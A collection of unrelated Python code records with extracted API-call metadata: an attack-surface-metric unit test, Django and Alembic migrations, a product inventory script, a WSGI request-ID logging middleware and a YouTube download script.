self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNotNone(callee_attrs)
self.assertTrue('tested' not in callee_attrs)
self.assertTrue('defense' in callee_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertEqual(callee_attrs['frequency'], 1)
# Scenario: main -- validate* (cflow)
# * Vulnerable
# Arrange
source = 'cflow'
vulnerabilities = [Call('validate', 'utils.c', Environments.C)]
caller = Call('main', 'main.c', Environments.C)
callee = Call('validate', 'utils.c', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), vulnerabilities
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in callee_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNotNone(callee_attrs)
self.assertTrue('tested' not in callee_attrs)
self.assertTrue('defense' not in callee_attrs)
self.assertTrue('vulnerable' in callee_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertEqual(callee_attrs['frequency'], 1)
# Scenario: main* -- validate+ (cflow)
# * Vulnerable
# + Designed defense and vulnerable
# Arrange
source = 'cflow'
defenses = [Call('validate', 'utils.c', Environments.C)]
vulnerabilities = [
Call('main', 'main.c', Environments.C),
Call('validate', 'utils.c', Environments.C)
]
caller = Call('main', 'main.c', Environments.C)
callee = Call('validate', 'utils.c', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, defenses, vulnerabilities
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNotNone(callee_attrs)
self.assertTrue('tested' not in callee_attrs)
self.assertTrue('defense' in callee_attrs)
self.assertTrue('vulnerable' in callee_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertEqual(callee_attrs['frequency'], 1)
# Scenario: main* -- validate+ (cflow)
# * Designed defense
# + Designed defense and vulnerable
# Arrange
source = 'cflow'
defenses = [
Call('main', 'main.c', Environments.C),
Call('validate', 'utils.c', Environments.C)
]
vulnerabilities = [
Call('main', 'main.c', Environments.C),
Call('validate', 'utils.c', Environments.C)
]
caller = Call('main', 'main.c', Environments.C)
callee = Call('validate', 'utils.c', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, defenses, vulnerabilities
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' in caller_attrs)
self.assertTrue('vulnerable' in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNotNone(callee_attrs)
self.assertTrue('tested' not in callee_attrs)
self.assertTrue('defense' in callee_attrs)
self.assertTrue('vulnerable' in callee_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertEqual(callee_attrs['frequency'], 1)
# Scenario: main -- chown (cflow)
# Arrange
source = 'cflow'
caller = Call('main', 'main.c', Environments.C)
callee = Call('chown', '', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNone(callee_attrs)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"copy.deepcopy",
"attacksurfacemeter.utilities.get_node_attrs",
"attacksurfacemeter.utilities.fix",
"os.path.realpath",
"attacksurfacemeter.call.Call",
"networkx.Graph",
"attacksurfacemeter.utilities.get_fragments",
"networkx.DiGraph"
] |
[((15798, 15813), 'unittest.main', 'unittest.main', ([], {}), '()\n', (15811, 15813), False, 'import unittest\n'), ((770, 791), 'copy.deepcopy', 'copy.deepcopy', (['target'], {}), '(target)\n', (783, 791), False, 'import copy\n'), ((1248, 1286), 'attacksurfacemeter.utilities.fix', 'utilities.fix', (['target'], {'using': 'reference'}), '(target, using=reference)\n', (1261, 1286), False, 'from attacksurfacemeter import utilities\n'), ((3639, 3651), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (3649, 3651), True, 'import networkx as nx\n'), ((4050, 4062), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (4060, 4062), True, 'import networkx as nx\n'), ((4308, 4320), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (4318, 4320), True, 'import networkx as nx\n'), ((4503, 4515), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (4513, 4515), True, 'import networkx as nx\n'), ((4647, 4659), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (4657, 4659), True, 'import networkx as nx\n'), ((4734, 4764), 'attacksurfacemeter.utilities.get_fragments', 'utilities.get_fragments', (['graph'], {}), '(graph)\n', (4757, 4764), False, 'from attacksurfacemeter import utilities\n'), ((5262, 5272), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (5270, 5272), True, 'import networkx as nx\n'), ((5789, 5801), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (5799, 5801), True, 'import networkx as nx\n'), ((6167, 6179), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (6177, 6179), True, 'import networkx as nx\n'), ((6777, 6815), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (6781, 6815), False, 'from attacksurfacemeter.call import Call\n'), ((6833, 6867), 'attacksurfacemeter.call.Call', 'Call', (['"""printf"""', '""""""', 'Environments.C'], {}), "('printf', '', Environments.C)\n", (6837, 6867), False, 'from attacksurfacemeter.call import Call\n'), ((7612, 7650), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (7616, 7650), False, 'from attacksurfacemeter.call import Call\n'), ((7668, 7702), 'attacksurfacemeter.call.Call', 'Call', (['"""printf"""', '""""""', 'Environments.C'], {}), "('printf', '', Environments.C)\n", (7672, 7702), False, 'from attacksurfacemeter.call import Call\n'), ((8441, 8479), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (8445, 8479), False, 'from attacksurfacemeter.call import Call\n'), ((9349, 9387), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (9353, 9387), False, 'from attacksurfacemeter.call import Call\n'), ((9405, 9448), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (9409, 9448), False, 'from attacksurfacemeter.call import Call\n'), ((10682, 10720), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (10686, 10720), False, 'from attacksurfacemeter.call import Call\n'), ((10738, 10781), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (10742, 10781), False, 'from attacksurfacemeter.call import Call\n'), ((12208, 12246), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (12212, 12246), False, 'from attacksurfacemeter.call import Call\n'), ((12264, 12307), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (12268, 12307), False, 'from attacksurfacemeter.call import Call\n'), ((12362, 12437), 'attacksurfacemeter.utilities.get_node_attrs', 'utilities.get_node_attrs', (['source', 'caller', 'callee', 'defenses', 'vulnerabilities'], {}), '(source, caller, callee, defenses, vulnerabilities)\n', (12386, 12437), False, 'from attacksurfacemeter import utilities\n'), ((13808, 13846), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (13812, 13846), False, 'from attacksurfacemeter.call import Call\n'), ((13864, 13907), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (13868, 13907), False, 'from attacksurfacemeter.call import Call\n'), ((13962, 14037), 'attacksurfacemeter.utilities.get_node_attrs', 'utilities.get_node_attrs', (['source', 'caller', 'callee', 'defenses', 'vulnerabilities'], {}), '(source, caller, callee, defenses, vulnerabilities)\n', (13986, 14037), False, 'from attacksurfacemeter import utilities\n'), ((15037, 15075), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (15041, 15075), False, 'from attacksurfacemeter.call import Call\n'), ((15093, 15126), 'attacksurfacemeter.call.Call', 'Call', (['"""chown"""', '""""""', 'Environments.C'], {}), "('chown', '', Environments.C)\n", (15097, 15126), False, 'from attacksurfacemeter.call import Call\n'), ((1093, 1133), 'attacksurfacemeter.call.Call', 'Call', (['"""GreeterSayHi"""', '""""""', 'Environments.C'], {}), "('GreeterSayHi', '', Environments.C)\n", (1097, 1133), False, 'from attacksurfacemeter.call import Call\n'), ((1156, 1214), 'attacksurfacemeter.call.Call', 'Call', (['"""GreeterSayHi"""', '"""./src/helloworld.c"""', 'Environments.C'], {}), "('GreeterSayHi', './src/helloworld.c', Environments.C)\n", (1160, 1214), False, 'from attacksurfacemeter.call import Call\n'), ((6459, 6489), 'attacksurfacemeter.utilities.get_fragments', 'utilities.get_fragments', (['graph'], {}), '(graph)\n', (6482, 6489), False, 'from attacksurfacemeter import utilities\n'), ((9287, 9330), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (9291, 9330), False, 'from attacksurfacemeter.call import Call\n'), ((10620, 10663), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (10624, 10663), False, 'from attacksurfacemeter.call import Call\n'), ((12000, 12043), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (12004, 12043), False, 'from attacksurfacemeter.call import Call\n'), ((12085, 12123), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (12089, 12123), False, 'from attacksurfacemeter.call import Call\n'), ((12137, 12180), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (12141, 12180), False, 'from attacksurfacemeter.call import Call\n'), ((13539, 13577), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (13543, 13577), False, 'from attacksurfacemeter.call import Call\n'), ((13591, 13634), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (13595, 13634), False, 'from attacksurfacemeter.call import Call\n'), ((13685, 13723), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (13689, 13723), False, 'from attacksurfacemeter.call import Call\n'), ((13737, 13780), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (13741, 13780), False, 'from attacksurfacemeter.call import Call\n'), ((600, 626), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (616, 626), False, 'import os\n'), ((926, 952), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (942, 952), False, 'import os\n')]
|
# Generated by Django 2.2.17 on 2021-03-05 09:56
from django.db import migrations
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('goods', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='goodstest',
options={'verbose_name': '商品', 'verbose_name_plural': '商品'},
),
migrations.AlterField(
model_name='goodstest',
name='detail',
field=tinymce.models.HTMLField(verbose_name='商品详情'),
),
]
|
[
"django.db.migrations.AlterModelOptions"
] |
[((237, 348), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""goodstest"""', 'options': "{'verbose_name': '商品', 'verbose_name_plural': '商品'}"}), "(name='goodstest', options={'verbose_name':\n '商品', 'verbose_name_plural': '商品'})\n", (265, 348), False, 'from django.db import migrations\n')]
|
# Importing needed library and Product class
import random
from acme import Product
# creating lists of adjectives and nouns
adjectives = ['Cool', 'Flavorful', 'Shiny', 'Awsome']
nouns = ['Phone', 'PS4', 'Computer', 'Anvil']
def generate_products(num_products=30):
'''
creates a list of products given the num_products input and the
adjectives and nouns lists
'''
products = []
for i in range(0, num_products):
name = adjectives[random.randint(0, len(adjectives)-1)]\
+ ' ' + nouns[random.randint(0, len(nouns)-1)]
price = random.randint(5, 100)
weight = random.randint(5, 100)
flammability = random.uniform(0.0, 2.5)
products.append(Product(name=name, price=price,
weight=weight, flammability=flammability))
return products
generate_products()
def inventory_report(products):
'''
takes a list of products input and outputs a nice summery
'''
price_list = []
weight_list = []
flame_list = []
for obj in products:
price_list.append(obj.price)
weight_list.append(obj.weight)
flame_list.append(obj.flammability)
average_price = sum(price_list) / len(price_list)
average_weight = sum(weight_list) / len(weight_list)
average_flame = sum(flame_list) / len(flame_list)
print('ACME CORPORATION OFFICIAL INVENTORY REPORT')
print('Unique product names: ' + str(len(products)))
print('Average price: {}'.format(average_price))
print('Average weight: {}'.format(average_weight))
print('Average flammability: {}'.format(average_flame))
if __name__ == '__main__':
inventory_report(generate_products())
|
[
"random.randint",
"acme.Product",
"random.uniform"
] |
[((578, 600), 'random.randint', 'random.randint', (['(5)', '(100)'], {}), '(5, 100)\n', (592, 600), False, 'import random\n'), ((618, 640), 'random.randint', 'random.randint', (['(5)', '(100)'], {}), '(5, 100)\n', (632, 640), False, 'import random\n'), ((664, 688), 'random.uniform', 'random.uniform', (['(0.0)', '(2.5)'], {}), '(0.0, 2.5)\n', (678, 688), False, 'import random\n'), ((713, 786), 'acme.Product', 'Product', ([], {'name': 'name', 'price': 'price', 'weight': 'weight', 'flammability': 'flammability'}), '(name=name, price=price, weight=weight, flammability=flammability)\n', (720, 786), False, 'from acme import Product\n')]
|
"""empty message
Revision ID: 8fb490efb894
Revises: <KEY>
Create Date: 2020-06-15 20:33:31.609050
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8fb490efb894'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('boss_base',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=32), nullable=True),
sa.Column('nameSafe', sa.String(length=32), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_boss_base_name'), 'boss_base', ['name'], unique=True)
op.create_index(op.f('ix_boss_base_nameSafe'), 'boss_base', ['nameSafe'], unique=True)
op.create_table('bossteam',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('hero', sa.String(length=16), nullable=True),
sa.Column('damage', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('bossbase_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['bossbase_id'], ['boss_base.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_bossteam_damage'), 'bossteam', ['damage'], unique=False)
op.create_index(op.f('ix_bossteam_hero'), 'bossteam', ['hero'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_bossteam_hero'), table_name='bossteam')
op.drop_index(op.f('ix_bossteam_damage'), table_name='bossteam')
op.drop_table('bossteam')
op.drop_index(op.f('ix_boss_base_nameSafe'), table_name='boss_base')
op.drop_index(op.f('ix_boss_base_name'), table_name='boss_base')
op.drop_table('boss_base')
# ### end Alembic commands ###
|
[
"alembic.op.drop_table",
"alembic.op.f",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.ForeignKeyConstraint",
"sqlalchemy.String",
"sqlalchemy.Integer"
] |
[((1690, 1715), 'alembic.op.drop_table', 'op.drop_table', (['"""bossteam"""'], {}), "('bossteam')\n", (1703, 1715), False, 'from alembic import op\n'), ((1862, 1888), 'alembic.op.drop_table', 'op.drop_table', (['"""boss_base"""'], {}), "('boss_base')\n", (1875, 1888), False, 'from alembic import op\n'), ((578, 607), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (601, 607), True, 'import sqlalchemy as sa\n'), ((634, 659), 'alembic.op.f', 'op.f', (['"""ix_boss_base_name"""'], {}), "('ix_boss_base_name')\n", (638, 659), False, 'from alembic import op\n'), ((717, 746), 'alembic.op.f', 'op.f', (['"""ix_boss_base_nameSafe"""'], {}), "('ix_boss_base_nameSafe')\n", (721, 746), False, 'from alembic import op\n'), ((1103, 1161), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['bossbase_id']", "['boss_base.id']"], {}), "(['bossbase_id'], ['boss_base.id'])\n", (1126, 1161), True, 'import sqlalchemy as sa\n'), ((1169, 1218), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['user_id']", "['user.id']"], {}), "(['user_id'], ['user.id'])\n", (1192, 1218), True, 'import sqlalchemy as sa\n'), ((1226, 1255), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1249, 1255), True, 'import sqlalchemy as sa\n'), ((1282, 1308), 'alembic.op.f', 'op.f', (['"""ix_bossteam_damage"""'], {}), "('ix_bossteam_damage')\n", (1286, 1308), False, 'from alembic import op\n'), ((1368, 1392), 'alembic.op.f', 'op.f', (['"""ix_bossteam_hero"""'], {}), "('ix_bossteam_hero')\n", (1372, 1392), False, 'from alembic import op\n'), ((1568, 1592), 'alembic.op.f', 'op.f', (['"""ix_bossteam_hero"""'], {}), "('ix_bossteam_hero')\n", (1572, 1592), False, 'from alembic import op\n'), ((1635, 1661), 'alembic.op.f', 'op.f', (['"""ix_bossteam_damage"""'], {}), "('ix_bossteam_damage')\n", (1639, 1661), False, 'from alembic import op\n'), ((1734, 1763), 'alembic.op.f', 'op.f', (['"""ix_boss_base_nameSafe"""'], {}), "('ix_boss_base_nameSafe')\n", (1738, 1763), False, 'from alembic import op\n'), ((1807, 1832), 'alembic.op.f', 'op.f', (['"""ix_boss_base_name"""'], {}), "('ix_boss_base_name')\n", (1811, 1832), False, 'from alembic import op\n'), ((419, 431), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (429, 431), True, 'import sqlalchemy as sa\n'), ((472, 492), 'sqlalchemy.String', 'sa.String', ([], {'length': '(32)'}), '(length=32)\n', (481, 492), True, 'import sqlalchemy as sa\n'), ((536, 556), 'sqlalchemy.String', 'sa.String', ([], {'length': '(32)'}), '(length=32)\n', (545, 556), True, 'import sqlalchemy as sa\n'), ((840, 852), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (850, 852), True, 'import sqlalchemy as sa\n'), ((893, 913), 'sqlalchemy.String', 'sa.String', ([], {'length': '(16)'}), '(length=16)\n', (902, 913), True, 'import sqlalchemy as sa\n'), ((955, 967), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (965, 967), True, 'import sqlalchemy as sa\n'), ((1010, 1022), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1020, 1022), True, 'import sqlalchemy as sa\n'), ((1069, 1081), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1079, 1081), True, 'import sqlalchemy as sa\n')]
|
"""
Middleware and logging filter to add request ids to logs and forward request Ids in downstream requests
"""
import logging
import re
import traceback
import datetime
import pythonjsonlogger
import pythonjsonlogger.jsonlogger
import wsgi_microservice_middleware
logger = logging.getLogger(__name__)
REQUEST_ID_HEADER_NAME = wsgi_microservice_middleware.env.str("REQUEST_ID_HEADER", "X-Request-Id")
LOG_TOKENS = wsgi_microservice_middleware.env.bool("LOG_TOKENS", True)
def make_wsgi_header_key(header: str):
wsgi_header = "HTTP_" + REQUEST_ID_HEADER_NAME.replace("-","_").upper()
return wsgi_header
class RequestIdMiddleware(object):
"""
This middleware add access log-style record with a request id and includes
the request Id in int he response headers
"""
def __init__(self, app, header_name: str = None):
self.header_name = header_name
if not self.header_name:
self.header_name = REQUEST_ID_HEADER_NAME
self.wsgi_header_key = make_wsgi_header_key(self.header_name)
self.app = app
def __call__(self, environ, start_response):
def custom_start_response(status, headers, exc_info=None):
# append whatever headers you need here
FACTS = [
environ.get("HTTP_HOST", ""),
environ.get("REQUEST_METHOD", ""),
environ.get("RAW_URI", ""),
environ.get("SERVER_PROTOCOL", ""),
status
]
message = " | ".join(FACTS)
request_id = environ.get(self.wsgi_header_key, '""')
extra = {"request_id": request_id}
token = None
if LOG_TOKENS:
try:
auth_header = environ.get("HTTP_AUTHORIZATION", None)
token = re.sub(r"\W", "", auth_header.lstrip("Bearer"))
if token:
extra.update({"token": token})
except Exception:
# No exception log, requst missing token
pass
adpater = logging.LoggerAdapter(logger, extra=extra)
adpater.info(message)
headers.append((self.header_name, request_id,))
return start_response(status, headers, exc_info)
return self.app(environ, custom_start_response)
def current_request_id():
"""
Retrives the current request id from the wsgi `environ` buried in the call stack
"""
_req = None
wsgi_header = "HTTP_" + REQUEST_ID_HEADER_NAME.replace("-","_").upper()
try:
for frame in traceback.walk_stack(None):
if getattr(frame[0], 'f_globals', None) and getattr(frame[0], 'f_locals', None):
if frame[0].f_globals.get('__name__', None) == __name__ and 'environ' in frame[0].f_locals:
environ = frame[0].f_locals['environ']
_req = environ.get(wsgi_header, None)
break
except Exception:
pass
return _req
class RequestIdFilter(logging.Filter):
"""
Logger filter to add a `{request_id}` logger variable tot he logging context
"""
def __init__(self, header_name=REQUEST_ID_HEADER_NAME, *args, **kwargs):
self.header_name = header_name
self.wsgi_header_key = "HTTP_" + self.header_name.replace("-","_").upper()
super().__init__(*args, **kwargs)
def filter(self, record):
record.request_id = self.get_current_request_id()
return True
def get_current_request_id(self):
_req = current_request_id()
if _req:
request_id = _req
else:
request_id = ""
return request_id
class RequestIdJsonLogFormatter(pythonjsonlogger.jsonlogger.JsonFormatter):
def add_fields(self, log_record, record, message_dict):
super(RequestIdJsonLogFormatter, self).add_fields(log_record, record, message_dict)
if not log_record.get('timestamp'):
# this doesn't use record.created, so it is slightly off
now = datetime.datetime.utcnow().astimezone(tz=datetime.timezone.utc).isoformat()
log_record['timestamp'] = now
if log_record.get('level'):
log_record['level'] = log_record['level'].upper()
else:
log_record['level'] = record.levelname
if not log_record.get('name'):
log_record['name'] = record.name
if not log_record.get('threadName'):
log_record['threadName'] = record.threadName
|
[
"wsgi_microservice_middleware.env.bool",
"traceback.walk_stack",
"datetime.datetime.utcnow",
"logging.LoggerAdapter",
"wsgi_microservice_middleware.env.str",
"logging.getLogger"
] |
[((276, 303), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (293, 303), False, 'import logging\n'), ((331, 404), 'wsgi_microservice_middleware.env.str', 'wsgi_microservice_middleware.env.str', (['"""REQUEST_ID_HEADER"""', '"""X-Request-Id"""'], {}), "('REQUEST_ID_HEADER', 'X-Request-Id')\n", (367, 404), False, 'import wsgi_microservice_middleware\n'), ((418, 475), 'wsgi_microservice_middleware.env.bool', 'wsgi_microservice_middleware.env.bool', (['"""LOG_TOKENS"""', '(True)'], {}), "('LOG_TOKENS', True)\n", (455, 475), False, 'import wsgi_microservice_middleware\n'), ((2600, 2626), 'traceback.walk_stack', 'traceback.walk_stack', (['None'], {}), '(None)\n', (2620, 2626), False, 'import traceback\n'), ((2090, 2132), 'logging.LoggerAdapter', 'logging.LoggerAdapter', (['logger'], {'extra': 'extra'}), '(logger, extra=extra)\n', (2111, 2132), False, 'import logging\n'), ((4063, 4089), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (4087, 4089), False, 'import datetime\n')]
|
# rattube.py
#
# Copyright 2020 <NAME> <<EMAIL>>
#
from termcolor import cprint
from pyfiglet import figlet_format
from pytube import YouTube
import time
from os import system, name
import sys
from colorama import init
init(strip=not sys.stdout.isatty())
class RatTube:
def limpiar_Pantalla(self):
if name == "nt":
_ = system('cls')
else:
_ = system('clear')
''' Con este método comprobamos si la plataforma es NT (Windows) o si es Linux.
Según el retorno boleano que se obtenga del método, ejecuta la instrucción usada en dicha
plataforma para limpiar la consola'''
def mostrar_Banner(self):
cprint(figlet_format('RatTube', font='banner3'), 'yellow', 'on_blue', attrs=['bold'])
'''Imprime el banner que se muestra en pantalla.
el método cprint recibe parámetros texto,color del texto y fondo que tendrá el texto,
attrs hace referencia a la fuente que sería en negrita
el texto que recibe el método cprint es lo que se obtiene de
formatearlo con el método figlet_format que lo convierte en ascii art y nos permite
elegir fuentes que contiene la biblioteca pyfiglet'''
def limpiar_Mostrar_Banner(self):
self.limpiar_Pantalla()
self.mostrar_Banner()
'''Este método limpia la pantalla y muestra el banner.
Se usa llamando los dos métodos juntos porque en la mayoría de los
llamados se necesita que el banner siga ejecutándose manteniendo la pantalla
limpia para dar enfoque a la tarea de descarga'''
def confirmar_Descargar(self):
url = input('\n\nIngresa la URL del video: ')
ruta = input('\nEn qué ruta de tu equipo guardarás el archivo\n(si no pones una ruta, se guardará en el directorio del script)? ')
yt = YouTube(url, on_progress_callback=self.progress_function)
print("\n", yt.title)
global video
video = yt.streams.first()
size1 = str(round(video.filesize / (1024 * 1024)))
print("\nTamaño del video: ", size1, " MB aprox.")
video.download(ruta)
tecla = input("\nPresione cualquier tecla para terminar")
time.sleep(3)
print("\n\nAdiós")
'''Este método hace uso de la biblioteca pytube,de la clase Youtube y sus métodos.
Permite realizar la descarga del video, pideo una url y la ruta de guardado
por defecto se guarda en la carpeta donde esté el script'''
def progress_function(stream, chunk, file_handle, bytes_remaining):
print(round((1-bytes_remaining/video.filesize)*100,3), '% done...')
def descargar(self):
self.limpiar_Mostrar_Banner()
print("""\n\n1. Ingresar URL del video
2. Volver""")
opcion = input("\nElija una opción: ")
if opcion == "1":
self.confirmar_Descargar()
else:
self.limpiar_Mostrar_Banner()
self.mostrar_Menu(self.descargar, self.salir)
'''Este método es para confirmar que si deseamos introducir la url del video.
Si no nos hemos equivocado, confirmaremos que pondremos la url, en caso que no
podremos dar en volver, ejecutando el método limpiar_Mostrar_Banner
y llamando al menú inicial nuevamente'''
def salir(self):
self.limpiar_Pantalla()
sys.exit()
'''Si elegimos salir en el menu, se ejecuta este método.
Nos permite terminar la ejecución del script sin interrumpir con el teclado'''
def mostrar_Menu(self, descargar, salir):
print("""\n1. Descargar video de Youtube
2. Salir""")
choice = input("\nElija un opción: ")
opciones = {"1": self.descargar, "2": self.salir}
if choice == "1":
eleccion = opciones[choice]()
while choice not in opciones:
print("\nNo se reconoce la opción")
time.sleep(5)
self.limpiar_Mostrar_Banner()
self.mostrar_Menu(self.descargar, self.salir)
else:
eleccion = opciones[choice]()
'''Muestra el menú inicial.
Llama desde aquí a los métodos necesarios para ejecutar las acciones
de descarga o de salida del script'''
rata = RatTube()
rata.limpiar_Pantalla()
rata.mostrar_Banner()
rata.mostrar_Menu(rata.descargar, rata.salir)
|
[
"pytube.YouTube",
"os.system",
"pyfiglet.figlet_format",
"time.sleep",
"sys.stdout.isatty",
"sys.exit"
] |
